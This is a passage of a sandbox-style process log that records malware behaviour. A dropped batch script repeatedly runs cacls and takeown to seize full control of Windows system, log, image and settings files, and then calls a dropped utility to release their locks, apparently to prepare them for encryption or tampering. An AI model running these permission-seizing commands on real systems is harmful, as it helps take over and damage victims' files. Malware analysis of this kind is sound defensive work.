C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:4948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:2256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "settings.dat" -nobanner3⤵PID:2552
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "settings.dat" -nobanner4⤵PID:4284
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C3⤵PID:3392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"3⤵
- Modifies file permissions
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "Data1.cab" -nobanner3⤵PID:896
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "Data1.cab" -nobanner4⤵PID:1760
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1752
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:1940
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:2764
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:2524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "superbar.png" -nobanner3⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "superbar.png" -nobanner4⤵PID:1012
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl""2⤵PID:3080
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl"3⤵PID:3164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" -nobanner3⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.725a8b0d-67ad-4781-9ab3-c09c6f7582f3.1.etl" -nobanner4⤵PID:2324
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl""2⤵PID:4740
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" /E /G Admin:F /C3⤵PID:288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" -nobanner3⤵PID:1304
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.6631957b-a353-4149-a362-e1d80af8303c.1.etl" -nobanner4⤵PID:3648
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:636
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl""2⤵PID:2848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" /E /G Admin:F /C3⤵PID:2744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl"3⤵PID:332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" -nobanner3⤵PID:1428
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "UpdateSessionOrchestration.d8c69359-837a-469e-8c32-ea039ba732ac.1.etl" -nobanner4⤵PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:3392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:1760
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "background.png" -nobanner3⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "background.png" -nobanner4⤵PID:1356
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""2⤵PID:4380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C3⤵PID:1012
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"3⤵PID:4372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner3⤵PID:3096
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner4⤵PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2024
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl""2⤵PID:4624
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" /E /G Admin:F /C3⤵PID:4680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl"3⤵
- Modifies file permissions
PID:1232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" -nobanner3⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "NotificationUxBroker.db872d3e-0426-4eca-b85d-7591529a3211.1.etl" -nobanner4⤵PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl""2⤵PID:4236
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" /E /G Admin:F /C3⤵PID:4844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl"3⤵PID:4572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" -nobanner3⤵PID:2264
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.c76c4b21-c660-4261-aeb0-6ea229835a59.1.etl" -nobanner4⤵PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3724
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl""2⤵PID:4464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" /E /G Admin:F /C3⤵PID:4284
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl"3⤵PID:2512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" -nobanner3⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.f106adb5-7fc4-42ac-85f8-58bf60128db1.1.etl" -nobanner4⤵PID:1904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:5100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:2756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
PID:4080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "wabmig.exe" -nobanner3⤵PID:2524
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "wabmig.exe" -nobanner4⤵PID:2896
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:3540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵PID:4960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:3164
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:3688
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3628
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""2⤵PID:1472
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C3⤵PID:2152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"3⤵
- Modifies file permissions
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "KnownGameList.bin" -nobanner3⤵PID:4156
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "KnownGameList.bin" -nobanner4⤵PID:280
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4948
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl""2⤵PID:2708
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl"3⤵PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" -nobanner3⤵PID:288
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" -nobanner4⤵PID:1916
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl""2⤵PID:1216
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" /E /G Admin:F /C3⤵PID:3112
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl"3⤵
- Modifies file permissions
PID:204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" -nobanner3⤵PID:4464
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" -nobanner4⤵PID:1880
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3392
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""2⤵PID:4080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C3⤵PID:2680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"3⤵
- Modifies file permissions
PID:1752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "TileCache_100_0_Header.bin" -nobanner3⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "TileCache_100_0_Header.bin" -nobanner4⤵PID:3316
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4620
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:2000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat"3⤵
- Modifies file permissions
PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "settings.dat" -nobanner3⤵PID:4956
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "settings.dat" -nobanner4⤵PID:2152
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵PID:3724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "watermark.png" -nobanner3⤵PID:2412
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "watermark.png" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl""2⤵PID:288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" /E /G Admin:F /C3⤵PID:1148
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl"3⤵PID:3644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" -nobanner3⤵PID:4744
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.025974d7-05d1-4c5a-9b19-e75169a38b02.1.etl" -nobanner4⤵PID:540
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl""2⤵PID:4288
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" /E /G Admin:F /C3⤵PID:3624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl"3⤵
- Modifies file permissions
PID:3968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.1754017e-b83a-4063-aea7-aa8578d06a53.1.etl" -nobanner4⤵PID:4864
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:4372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵
- Modifies file permissions
PID:3164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:276
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl""2⤵PID:1408
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl"3⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" -nobanner3⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "MoUsoCoreWorker.98508efd-0722-4d60-b35c-daab6c4467d0.1.etl" -nobanner4⤵PID:3152
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl""2⤵PID:4572
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" /E /G Admin:F /C3⤵PID:3076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl"3⤵PID:2640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "WuProvider.8147676f-7ebb-4222-babe-ad996498dac1.1.etl" -nobanner4⤵PID:4384
-
-
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SF8IqVRR.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:540
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:2384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵
- Modifies file permissions
PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tLRJU41K.exe -accepteula "background.png" -nobanner3⤵PID:4660
-
C:\Users\Admin\AppData\Local\Temp\tLRJU41K.exetLRJU41K.exe -accepteula "background.png" -nobanner4⤵PID:3392
-
-
-
